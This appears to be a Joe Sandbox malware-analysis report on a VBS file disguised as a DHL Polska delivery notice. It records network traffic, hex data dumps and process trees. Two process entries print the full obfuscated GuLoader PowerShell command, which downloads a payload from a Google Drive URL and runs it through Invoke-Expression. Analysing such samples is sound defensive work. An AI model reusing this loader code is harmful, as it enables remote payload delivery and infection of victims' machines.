            Content-Security-Policy: script-src 'nonce-BHj6huSyO8UCn2uNCo8MKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
            Cross-Origin-Opener-Policy: same-origin
            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            Server: ESF
            Content-Length: 0
            X-XSS-Protection: 0
            X-Frame-Options: SAMEORIGIN
            X-Content-Type-Options: nosniff
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.4 | 49739 | 142.250.186.161 | 443 | 8096 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-03 06:52:17 UTC | 233 | OUT | GET /download?id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC&export=download HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.usercontent.google.com
            Connection: Keep-Alive
            2024-07-03 06:52:18 UTC | 4828 | IN | HTTP/1.1 200 OK
            Content-Type: application/octet-stream
            Content-Security-Policy: sandbox
            Content-Security-Policy: default-src 'none'
            Content-Security-Policy: frame-ancestors 'none'
            X-Content-Security-Policy: sandbox
            Cross-Origin-Opener-Policy: same-origin
            Cross-Origin-Embedder-Policy: require-corp
            Cross-Origin-Resource-Policy: same-site
            X-Content-Type-Options: nosniff
            Content-Disposition: attachment; filename="Declaratives.pfb"
            Access-Control-Allow-Origin: *
            Access-Control-Allow-Credentials: false
            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
            Accept-Ranges: bytes
            Content-Length: 437716
            Last-Modified: Tue, 02 Jul 2024 09:26:33 GMT
            X-GUploader-UploadID: ACJd0NraQgWBJ9mZilfxsIO-BEr1wuLiB_ojXTQgPzqTU6DuFdPiStEvdjBZyRSnFtFZBY9d1rxiynwp2Q
            Date: Wed, 03 Jul 2024 06:52:18 GMT
            Expires: Wed, 03 Jul 2024 06:52:18 GMT
            Cache-Control: private, max-age=0
            X-Goog-Hash: crc32c=foKCBQ==
            Server: UploadServer
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close
            2024-07-03 06:52:18 UTC1390INData Raw: 58 77 4f 53 75 32 31 36 51 71 32 7a 39 4a 4c 70 4c 46 37 4d 2b 37 50 64 2f 67 73 47 72 5a 30 45 77 76 4f 53 62 56 75 30 74 37 58 77 68 35 75 38 6b 43 38 2f 77 54 51 73 71 79 6b 4c 70 54 34 4f 73 6f 50 35 33 32 63 6b 7a 51 6c 63 36 67 62 63 2b 71 58 6a 6b 46 38 73 4a 62 32 73 35 65 39 43 4a 77 4a 5a 72 6f 41 42 4c 74 6f 4d 6e 51 35 49 53 7a 49 75 57 41 36 36 75 65 49 45 4b 7a 6f 57 6d 2f 64 49 32 72 73 31 37 51 35 75 30 45 43 48 59 58 36 76 6b 4e 50 2b 74 37 39 62 4c 71 73 70 43 36 55 2b 43 37 64 62 6e 61 4d 64 4a 4e 41 36 4a 71 77 46 33 50 2f 35 4d 6b 53 2b 4a 4d 69 57 63 45 6c 51 43 70 55 73 32 56 77 2b 4f 41 65 4c 65 36 2b 2f 68 74 59 6a 42 31 49 42 6a 38 69 56 76 67 76 79 49 78 59 4d 4a 75 77 71 2f 54 76 63 64 4e 57 69 6d 41 6d 6c 4d 64 49 34 77 7a 70
            Data Ascii: XwOSu216Qq2z9JLpLF7M+7Pd/gsGrZ0EwvOSbVu0t7Xwh5u8kC8/wTQsqykLpT4OsoP532ckzQlc6gbc+qXjkF8sJb2s5e9CJwJZroABLtoMnQ5ISzIuWA66ueIEKzoWm/dI2rs17Q5u0ECHYX6vkNP+t79bLqspC6U+C7dbnaMdJNA6JqwF3P/5MkS+JMiWcElQCpUs2Vw+OAeLe6+/htYjB1IBj8iVvgvyIxYMJuwq/TvcdNWimAmlMdI4wzp
            2024-07-03 06:52:18 UTC1390INData Raw: 4e 41 37 2f 4b 69 31 4f 36 73 4f 63 43 4d 66 30 74 54 65 56 57 45 55 47 67 44 2b 34 6f 7a 55 75 71 39 78 6d 77 65 78 36 71 4d 6e 76 52 48 4e 56 72 50 66 43 57 59 72 56 50 54 75 69 73 57 73 59 6a 62 52 46 58 49 6e 79 6a 36 75 34 31 52 54 61 61 6d 39 6c 71 31 45 53 32 74 74 56 78 4a 4c 44 38 50 73 2b 58 69 62 64 55 6b 2f 4f 37 48 4a 39 54 63 79 30 63 39 4b 45 55 6b 31 50 51 51 74 67 7a 63 2b 34 58 75 53 4f 67 73 4e 41 72 64 2f 42 52 46 4f 31 6a 31 42 72 4d 4e 2b 6d 36 70 68 2b 64 62 34 4e 63 45 78 2b 39 6e 51 77 74 36 61 52 2b 36 43 73 6e 30 57 65 35 50 50 79 51 67 47 59 45 48 73 52 47 37 46 77 6e 44 4d 5a 6f 34 70 54 35 64 43 61 55 2b 58 51 6d 6c 50 6c 30 4a 75 7a 74 51 75 79 48 49 57 45 74 78 42 33 55 38 4c 38 45 57 6d 2f 65 45 78 51 73 71 71 64 7a 37 56
            Data Ascii: NA7/Ki1O6sOcCMf0tTeVWEUGgD+4ozUuq9xmwex6qMnvRHNVrPfCWYrVPTuisWsYjbRFXInyj6u41RTaam9lq1ES2ttVxJLD8Ps+XibdUk/O7HJ9Tcy0c9KEUk1PQQtgzc+4XuSOgsNArd/BRFO1j1BrMN+m6ph+db4NcEx+9nQwt6aR+6Csn0We5PPyQgGYEHsRG7FwnDMZo4pT5dCaU+XQmlPl0JuztQuyHIWEtxB3U8L8EWm/eExQsqqdz7V
            2024-07-03 06:52:18 UTC1390INData Raw: 56 55 56 54 75 57 73 32 33 48 54 56 63 57 55 4a 70 54 48 51 73 50 73 36 58 56 59 68 77 41 57 41 45 43 4a 66 43 61 56 6f 34 36 2f 43 4a 4e 79 49 55 36 62 63 49 6f 75 2f 73 7a 64 41 44 2f 4a 62 4f 62 65 2f 43 4a 65 6a 5a 63 50 53 4f 50 73 2b 31 36 74 76 7a 47 69 69 54 41 32 56 51 6e 58 32 69 42 6c 55 6e 2f 78 31 4d 4b 66 66 50 46 2b 7a 7a 68 6e 5a 4e 4c 53 79 38 31 63 6c 62 65 59 34 4c 77 68 53 69 46 37 4a 58 51 6d 6c 4d 64 50 39 2b 54 70 64 55 76 39 76 35 47 4b 47 53 33 32 4b 58 48 39 53 6a 55 5a 69 57 51 6e 38 59 4f 4e 77 4e 35 4b 50 2b 71 72 35 61 77 6d 6c 50 6c 30 4a 70 54 35 64 43 61 55 2b 58 54 65 4f 35 73 31 6b 68 51 4c 47 69 74 78 63 51 67 38 39 34 34 55 66 65 4f 42 45 65 57 6e 77 4a 77 42 39 73 33 4f 36 49 51 47 35 39 30 2f 52 54 70 6d 57 76 36 73
            Data Ascii: VUVTuWs23HTVcWUJpTHQsPs6XVYhwAWAECJfCaVo46/CJNyIU6bcIou/szdAD/JbObe/CJejZcPSOPs+16tvzGiiTA2VQnX2iBlUn/x1MKffPF+zzhnZNLSy81clbeY4LwhSiF7JXQmlMdP9+TpdUv9v5GKGS32KXH9SjUZiWQn8YONwN5KP+qr5awmlPl0JpT5dCaU+XTeO5s1khQLGitxcQg8944UfeOBEeWnwJwB9s3O6IQG590/RTpmWv6s
            2024-07-03 06:52:18 UTC1390INData Raw: 7a 55 4a 4d 67 6d 50 50 6f 75 43 37 65 2b 4f 2b 38 43 4a 4d 69 69 6c 6f 47 71 33 4d 38 41 67 50 51 35 4a 4d 6a 32 6d 51 4a 50 33 4f 66 48 41 72 71 6f 4c 41 44 39 30 48 42 6d 77 50 73 49 6c 32 45 42 63 44 4e 38 77 70 34 2b 37 43 69 73 79 58 62 45 71 6e 4d 52 33 43 43 32 58 49 51 61 6b 55 76 4f 50 65 48 31 6c 6d 65 59 57 62 70 4e 5a 6b 46 54 73 42 39 45 56 79 54 51 58 52 6d 6c 50 74 53 63 75 7a 78 64 43 52 38 51 46 32 2b 78 38 6c 68 44 51 70 6f 39 30 65 6a 74 46 79 7a 79 4e 7a 2f 51 4b 42 63 71 75 39 7a 32 79 78 36 4c 71 66 4c 2b 6e 48 55 79 4b 32 73 41 44 37 4d 57 75 6e 6a 4b 4a 50 78 7a 2b 6d 55 5a 33 50 75 75 33 64 6c 62 4a 4d 78 66 52 48 33 36 33 50 74 4e 35 75 64 31 38 36 4c 55 37 36 51 6f 77 47 2b 63 78 53 63 64 62 54 35 47 6a 64 72 2f 71 54 37 5a 55
            Data Ascii: zUJMgmPPouC7e+O+8CJMiiloGq3M8AgPQ5JMj2mQJP3OfHArqoLAD90HBmwPsIl2EBcDN8wp4+7CisyXbEqnMR3CC2XIQakUvOPeH1lmeYWbpNZkFTsB9EVyTQXRmlPtScuzxdCR8QF2+x8lhDQpo90ejtFyzyNz/QKBcqu9z2yx6LqfL+nHUyK2sAD7MWunjKJPxz+mUZ3Puu3dlbJMxfRH363PtN5ud186LU76QowG+cxScdbT5Gjdr/qT7ZU


            Target ID:0
            Start time:02:50:16
            Start date:03/07/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs"
            Imagebase:0x7ff7b1da0000
            File size:170'496 bytes
            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:5
            Start time:02:52:13
            Start date:03/07/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. 
IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNooCuwStnIml.ao,aa,wdKaF iU l ie .( .$ AlS.oUnv .rT.e egCll,ae OnBesBu,Ta$TuW .i .n ,dCaoI.wSustrhDeoB.p.op iKonEpgPr)Ko ';$Windowshopping=$bigthatch[0];Extensionalism (Trosfllen 'S $Cog AlFuo.obTaaP.lEn: yG nyAtm ,n aa fs.tt ke .rFonAfe,tsH,= O( RTA eGasHotNo-A.PV,aArt ,hOc o$FoWH.iS,nGadMeo SwPrsSvhTeo,ppExpU.iSlnOpgOm)Ac ');while (!$Gymnasternes) {Extensionalism (Trosfllen ' n$ hgT lbooSub,uaJolFl:PeS SkMeo ,l ieLes ,kO,eCamSuaVasIn= U$OutfirBluPreCa ') ;Extensionalism $Padleaare;Extensionalism (Trosfllen '.aS Tt.haStrDit.a-AdSUnl HeEke,lplk Ki4 H ');Extensionalism (Trosfllen 'E,$OvgT l aoS.b PaPolKo:siGAny mD,nTaaLysR,t ae r NnS,eShsRi=.e(M TExeStsU.tI,-AnPMaa ntCahNo go$PaWR,irenS.dDeoaswSvs AhProR,p ip.ii InHegBe)T ') ;Extensionalism (Trosfllen 'W,$T,g .lM,oChbfoa.alT :K.O tr trehgloFldFriCoa gBer aPrpO,hS.y o2Ru1 .7Fo= l$ ,g,yl MoDebPra 
SlT,:C HP eOvm TilitDeeJar uaNdtGaiDrcJ,+Pa+Be%Re$.iMHyaPolYmlMaef.o nlR a SrTr.Rac ,oHuuOtnBetEn ') ;$lovreglens=$Malleolar[$Orthodiagraphy217];}$Firetogs123=301889;$Stjrthagerne=26396;Extensionalism (Trosfllen 'P $AcgSllTio.nbGta rl,o:EnNVaoM n.esVkcE aV lBaaSerRe G.=Mi BG.ceIntSc-S.CA oS.nPrtCae CnAnt U Pa$NaW.oi,lnNudB oApwIns,nh Fo Jp Bp PiS,nReg.a ');Extensionalism (Trosfllen ',r$HogSnlOboWabBuaHelS,:DiG.uaTrl GlB u .paat,aaD.lSel Ae en SeSns n2 p9La D.=R A[ oSReyTisfrt ieCom .L.CDeo.onF.vnie.nrOvtG,]Be: D: TF Dr MoNom LBA,a osBue E6Mn4,eSS t .rH iRonB g (a $ ,N,yoRanTesPecPoaOrlCha srTr)Ly ');Extensionalism (Trosfllen 'Oc$Prg ,lAloP.b.iaFel V:P AS.bN.eRitHo2Un2 .6Ut F.=Th St[KoS ByC,sCatUne m .roTBle.hxDet K.PrEa.nSkcApoFedS iP.nlig .] r: A:FoA.rSSkCBeIC,IT,.jaG ReR,tInS Otter FiMenArgS (,e$ KGDiaKol.olFsuInpF t NaF l.gl le ,nB.eklsN,2 S9Ci).n ');Extensionalism (Trosfllen 'Li$,sgKol,eodobUla ,l.f:,aUHnnIns Ww FeErlg,tNoe vr.diStnCig,a=A $unA MbO e.pt.l2 a2Op6,i.AfsPauArb Ns MtKorKoiUdnRegBe(Pe$AiFUniDir de ,tS o,ng,asR.1Ko2Gr3Fe, T$CoSP,t BjDerF,t,lhA,aKag ae Lr.rnTie S)Cr ');Extensionalism $Unsweltering;"
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:false

            Target ID:6
            Start time:02:52:13
            Start date:03/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:7
            Start time:02:52:15
            Start date:03/07/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"
            Imagebase:0x7ff7548f0000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:02:52:23
            Start date:03/07/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. 
IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNooCuwStnIml.ao,aa,wdKaF iU l ie .( .$ AlS.oUnv .rT.e egCll,ae OnBesBu,Ta$TuW .i .n ,dCaoI.wSustrhDeoB.p.op iKonEpgPr)Ko ';$Windowshopping=$bigthatch[0];Extensionalism (Trosfllen 'S $Cog AlFuo.obTaaP.lEn: yG nyAtm ,n aa fs.tt ke .rFonAfe,tsH,= O( RTA eGasHotNo-A.PV,aArt ,hOc o$FoWH.iS,nGadMeo SwPrsSvhTeo,ppExpU.iSlnOpgOm)Ac ');while (!$Gymnasternes) {Extensionalism (Trosfllen ' n$ hgT lbooSub,uaJolFl:PeS SkMeo ,l ieLes ,kO,eCamSuaVasIn= U$OutfirBluPreCa ') ;Extensionalism $Padleaare;Extensionalism (Trosfllen '.aS Tt.haStrDit.a-AdSUnl HeEke,lplk Ki4 H ');Extensionalism (Trosfllen 'E,$OvgT l aoS.b PaPolKo:siGAny mD,nTaaLysR,t ae r NnS,eShsRi=.e(M TExeStsU.tI,-AnPMaa ntCahNo go$PaWR,irenS.dDeoaswSvs AhProR,p ip.ii InHegBe)T ') ;Extensionalism (Trosfllen 'W,$T,g .lM,oChbfoa.alT :K.O tr trehgloFldFriCoa gBer aPrpO,hS.y o2Ru1 .7Fo= l$ ,g,yl MoDebPra 
SlT,:C HP eOvm TilitDeeJar uaNdtGaiDrcJ,+Pa+Be%Re$.iMHyaPolYmlMaef.o nlR a SrTr.Rac ,oHuuOtnBetEn ') ;$lovreglens=$Malleolar[$Orthodiagraphy217];}$Firetogs123=301889;$Stjrthagerne=26396;Extensionalism (Trosfllen 'P $AcgSllTio.nbGta rl,o:EnNVaoM n.esVkcE aV lBaaSerRe G.=Mi BG.ceIntSc-S.CA oS.nPrtCae CnAnt U Pa$NaW.oi,lnNudB oApwIns,nh Fo Jp Bp PiS,nReg.a ');Extensionalism (Trosfllen ',r$HogSnlOboWabBuaHelS,:DiG.uaTrl GlB u .paat,aaD.lSel Ae en SeSns n2 p9La D.=R A[ oSReyTisfrt ieCom .L.CDeo.onF.vnie.nrOvtG,]Be: D: TF Dr MoNom LBA,a osBue E6Mn4,eSS t .rH iRonB g (a $ ,N,yoRanTesPecPoaOrlCha srTr)Ly ');Extensionalism (Trosfllen 'Oc$Prg ,lAloP.b.iaFel V:P AS.bN.eRitHo2Un2 .6Ut F.=Th St[KoS ByC,sCatUne m .roTBle.hxDet K.PrEa.nSkcApoFedS iP.nlig .] r: A:FoA.rSSkCBeIC,IT,.jaG ReR,tInS Otter FiMenArgS (,e$ KGDiaKol.olFsuInpF t NaF l.gl le ,nB.eklsN,2 S9Ci).n ');Extensionalism (Trosfllen 'Li$,sgKol,eodobUla ,l.f:,aUHnnIns Ww FeErlg,tNoe vr.diStnCig,a=A $unA MbO e.pt.l2 a2Op6,i.AfsPauArb Ns MtKorKoiUdnRegBe(Pe$AiFUniDir de ,tS o,ng,asR.1Ko2Gr3Fe, T$CoSP,t BjDerF,t,lhA,aKag ae Lr.rnTie S)Cr ');Extensionalism $Unsweltering;"
            Imagebase:0x7ff70f330000
            File size:433'152 bytes
            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.2973558788.000000000607A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:false

            Target ID:10
            Start time:02:52:23
            Start date:03/07/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"
            Imagebase:0x240000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

              Memory Dump Source
              • Source File: 00000005.00000002.3021697744.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b880000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d050bd8b8396799979d81682a196ed17994bf91db21a9dcdfd324bde9ef569a
              • Instruction ID: 865637b7a4e2c36ad89250fa54efe91b7bd31ef60ea03bb576b91ca9593e5487
              • Opcode Fuzzy Hash: 9d050bd8b8396799979d81682a196ed17994bf91db21a9dcdfd324bde9ef569a
              • Instruction Fuzzy Hash: 63F1D230A09A4D8FDF98DF5CC4A5AE977F1FF58300F1541AAD419D72A6CA34E842CB81
              Memory Dump Source
              • Source File: 00000005.00000002.3022315199.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b950000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a715bb7dfb1534531b462678ce5f7ddcc5a4d4d4662531cd43a9d7830fe8cc4b
              • Instruction ID: e7394d308b7eed9fe42eae82393287e1bbb2fa6a2498a9118eae75612a07d0bf
